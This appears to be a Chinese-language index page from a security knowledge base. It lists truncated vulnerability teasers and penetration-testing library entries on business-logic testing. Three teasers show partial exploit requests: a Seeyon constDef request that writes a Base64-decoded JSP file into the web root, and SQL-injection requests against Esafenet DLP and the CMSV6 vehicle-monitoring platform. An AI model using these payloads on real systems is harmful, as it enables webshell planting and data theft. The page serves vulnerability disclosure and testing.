秃兔
致远在野constDef接囗存在代码执行漏洞
GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host:Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917:JSESSIONID=06DCD58EDC037F785605A29CD7425C66Cache-Control: max-age=0Sec-Ch...
通天星 CMSV6 车载定位监控平台 disable SQL注入漏洞
GET /edu security officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+268
【渗透文库】信息删除场景业务逻辑测试
测试描述:通过抓包工具分析信息删除场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易删除的业务场景 测试工...
【渗透文库】信息导出/下载场景业务逻辑测试
测试描述:通过抓包工具分析信息导出/下载场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易信息导出/下载的...
【渗透文库】信息修改场景业务逻辑测试
测试描述:通过抓包工具分析信息修改场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:涉及客户信息修改和金融交易修改的业务场景 测试工...
【渗透文库】信息查询场景业务逻辑测试
测试描述:通过抓包工具分析信息查询场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞 测试标签:WEB应用安全测试 业务场景:信息查询场景(包括但不限于客户信息查询和金融交...
【渗透文库】密码找回场景业务逻辑测试
测试描述:通过抓包工具分析密码找回场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 业务...
